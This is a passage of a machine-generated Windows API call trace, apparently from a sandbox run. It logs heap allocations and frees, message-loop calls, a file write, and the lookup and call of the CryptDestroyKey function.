(HeapHandle=0x970000, Flags=0x0, Size=0xc6f8) returned 0x2e98120 [0255.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f320 | out: hHeap=0x970000) returned 1 [0256.001] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0256.001] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0256.001] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0256.001] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0256.001] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0256.001] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54210 | out: hHeap=0x970000) returned 1 [0256.001] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0256.001] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0256.001] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a90 | out: hHeap=0x970000) returned 1 [0256.001] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0256.001] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0256.001] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0256.001] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0256.001] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977bd8 | out: hHeap=0x970000) returned 1 [0256.001] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a28 | out: hHeap=0x970000) returned 1 [0256.001] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0256.001] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518e0 | out: hHeap=0x970000) returned 1 [0256.001] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0256.002] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54148 | out: hHeap=0x970000) returned 1 [0256.002] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0256.002] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e563c8 | out: hHeap=0x970000) returned 1 [0256.002] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516b8 | out: hHeap=0x970000) returned 1 [0256.002] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51718 | out: hHeap=0x970000) returned 1 [0256.002] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0256.002] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540d0 | out: hHeap=0x970000) returned 1 [0256.002] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0256.002] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0256.002] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0256.002] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54288 | out: hHeap=0x970000) returned 1 [0256.002] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0256.002] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0256.002] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977b18 | out: hHeap=0x970000) returned 1 [0256.002] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0256.002] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f39510 | out: hHeap=0x970000) returned 1 [0256.003] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0256.003] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0256.003] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0256.003] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0256.003] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543c8 | out: hHeap=0x970000) returned 1 [0256.003] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515e0 | out: hHeap=0x970000) returned 1 [0256.003] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54238 | out: hHeap=0x970000) returned 1 [0256.004] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0256.004] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54418 | out: hHeap=0x970000) returned 1 [0256.004] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0256.004] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542b0 | out: hHeap=0x970000) returned 1 [0256.004] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0256.004] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54440 | out: hHeap=0x970000) returned 1 [0256.004] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0256.004] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0256.004] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0256.004] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543a0 | out: hHeap=0x970000) returned 1 [0256.004] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f2ce10 | out: hHeap=0x970000) returned 1 [0256.005] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0256.005] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0256.005] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0256.005] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0256.005] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54378 | out: hHeap=0x970000) returned 1 [0256.005] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e8ba20 | out: hHeap=0x970000) returned 1 [0256.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0256.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0256.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0256.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0256.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544e0 | out: hHeap=0x970000) returned 1 [0256.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51328 | out: hHeap=0x970000) returned 1 [0256.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0256.006] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0256.007] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0256.007] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0256.007] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0256.007] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f14010 | out: hHeap=0x970000) returned 1 [0256.007] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0256.007] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0256.007] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0256.007] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0256.007] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0256.007] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0256.007] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0256.007] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f20710 | out: hHeap=0x970000) returned 1 [0256.009] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0256.009] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0256.009] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc6f8) returned 0x2e7f320 [0256.010] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e98120 | out: hHeap=0x970000) returned 1 [0256.011] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0256.011] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 1 [0256.011] TranslateMessage (lpMsg=0x8cf708) returned 0 [0256.012] DispatchMessageW (lpMsg=0x8cf708) returned 0x0 [0256.012] KillTimer (hWnd=0x402c2, uIDEvent=0x1) returned 1 [0256.012] SetTimer (hWnd=0x402c2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0256.012] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0256.012] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0256.012] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0256.012] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0256.012] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0256.012] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0256.012] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0256.012] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0256.012] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0256.012] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0256.012] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0256.012] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0256.012] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0256.012] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0256.012] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc6f8) returned 0x2f14010 [0256.014] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0256.014] WriteFile (in: hFile=0x2d0, lpBuffer=0x2f14010*, nNumberOfBytesToWrite=0xc6f8, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2f14010*, lpNumberOfBytesWritten=0x8cf5e4*=0xc6f8, lpOverlapped=0x0) returned 1 [0256.016] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0256.016] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f14010 | out: hHeap=0x970000) returned 1 [0256.018] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0256.018] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0256.018] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0256.018] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0256.019] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0256.019] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0256.019] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77688 | out: hHeap=0x970000) returned 1 [0256.019] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77b08 | out: hHeap=0x970000) returned 1 [0256.019] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a88 | out: hHeap=0x970000) returned 1 [0256.019] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0256.019] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0256.019] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0256.019] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699e8 [0256.019] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699e8 | out: hHeap=0x970000) returned 1 [0256.019] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0256.019] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0256.019] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51328 [0256.019] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e514d8 [0256.019] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0256.019] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51538 [0256.019] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51550 [0256.019] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0256.019] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51358 [0256.019] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54468 [0256.020] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51328 | out: hHeap=0x970000) returned 1 [0256.020] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51400 [0256.020] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55d50 [0256.020] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0256.020] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0256.020] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55d50 | out: hHeap=0x970000) returned 1 [0256.020] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0256.020] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0256.020] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e55018 [0256.020] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0256.020] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0256.020] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0256.020] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0256.020] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51430 [0256.020] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54490 [0256.020] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51328 [0256.020] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0256.020] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51328 | out: hHeap=0x970000) returned 1 [0256.020] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54328 [0256.020] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0256.020] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0256.020] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0256.020] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0256.020] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0256.020] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512c8 [0256.021] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0256.021] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0256.021] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54198 [0256.021] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0256.021] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0256.021] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51460 [0256.021] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0256.021] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0256.021] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0256.021] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0256.021] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0256.021] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0256.021] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55c70 [0256.021] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0256.021] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0256.021] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55c70 | out: hHeap=0x970000) returned 1 [0256.021] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0256.021] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51490 [0256.021] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78c00 [0256.021] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0256.021] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0256.021] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0256.021] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0256.021] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0256.021] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78c00 | out: hHeap=0x970000) returned 1 [0256.021] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0256.022] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0256.022] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51310 [0256.022] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0256.022] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512c8 [0256.022] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0256.022] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0256.022] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0256.022] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51328 [0256.022] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0256.022] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0256.022] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0256.022] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0256.022] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0256.022] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54080 [0256.022] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0256.022] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0256.022] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0256.022] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0256.022] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0256.022] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0256.022] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0256.022] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0256.022] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0256.022] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0256.022] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51640 [0256.023] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0256.023] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0256.023] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51640 | out: hHeap=0x970000) returned 1 [0256.023] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0256.023] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51700 [0256.023] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0256.023] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515f8 [0256.023] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0256.023] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0256.023] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51808 [0256.023] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515f8 | out: hHeap=0x970000) returned 1 [0256.023] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0256.023] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51808 | out: hHeap=0x970000) returned 1 [0256.023] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0256.023] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51790 [0256.023] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0256.023] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0256.023] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517f0 [0256.023] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2e517f0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0256.023] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517f0 | out: hHeap=0x970000) returned 1 [0256.023] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDestroyKey") returned 0x756ffa60 [0256.024] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51790 | out: hHeap=0x970000) returned 1 [0256.024] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0256.024] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516a0 [0256.024] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0256.024] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0256.024] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516a0 | out: hHeap=0x970000) returned 1 [0256.024] CryptDestroyKey (hKey=0xa87250) returned 1 [0256.024] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e561a8 [0256.024] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 